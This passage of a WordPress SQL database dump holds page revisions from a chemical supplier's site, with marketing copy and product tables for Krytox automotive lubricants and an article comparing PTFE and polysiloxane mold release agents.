volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.</p>\n<p>O-Ring Lubrication/Assembly Lube</p>\n<p>O-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.</p>\n<p>Alternator</p>\n<p>The alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.</p>\n<p>As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.</p>\n<p>This reduces the alternator’s performance and robs performance from the rest of the automobile.</p>\n<p>Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.</p>\n<p>EGR Valve</p>\n<p>The exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.</p>\n<p>Figure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications</p>\n<p><img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" /></p>\n<p>Spark Plug Boots</p>\n<p>The spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.</p>\n<p>The boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.</p>\n<p><strong>The following Krytox lubricants are great automotive lubricants:</strong></p>\n[ux_product_categories ids="96,98,97,37,168" number="10"]\n\n<p><a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a></p>\n<p><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a></p>\n<p><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a></p>\n<p><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-07 17:16:08', '2016-10-07 17:16:08', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2404, 3, '2016-10-07 17:17:40', '2016-10-07 17:17:40', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n<span style="text-decoration: underline;"><strong>Miller-Stephenson Mold Release Agents Available</strong></span>\r\n\r\n[ux_product_categories ids="21,16," number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 17:17:40', '2016-10-07 17:17:40', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2405, 2, '2016-10-07 17:34:47', '2016-10-07 17:34:47', '<strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong>\r\n\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n\r\n<strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong>\r\n\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nLonger Lasting Lubrication\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\n<strong>The Right Choice for Your Design Challenge</strong>\r\n\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<strong>The Right Choice for Our Environment</strong>\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\n<strong>Effective Over a Wide Temperature Range</strong>\r\n\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XHT AC</td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Compatibility with Elastomers and Plastics</strong>\r\n\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<strong>Compatibility with Metals</strong>\r\n\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n\r\n<strong>Robust Electrical Properties</strong>\r\n\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n\r\n<strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong>\r\n\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n\r\n<strong>Cost-Effective</strong>\r\n\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n\r\n<strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong>\r\n\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n\r\n<strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong>\r\n\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n\r\n<strong>The following Krytox lubricants are great automotive lubricants:</strong>\r\n\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-07 17:34:47', '2016-10-07 17:34:47', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2406, 2, '2016-10-07 17:36:51', '2016-10-07 17:36:51', '<strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong>\r\n\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n\r\n<strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong>\r\n\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nLonger Lasting Lubrication\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\n<strong>The Right Choice for Your Design Challenge</strong>\r\n\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<strong>The Right Choice for Our Environment</strong>\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\n<strong>Effective Over a Wide Temperature Range</strong>\r\n\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test 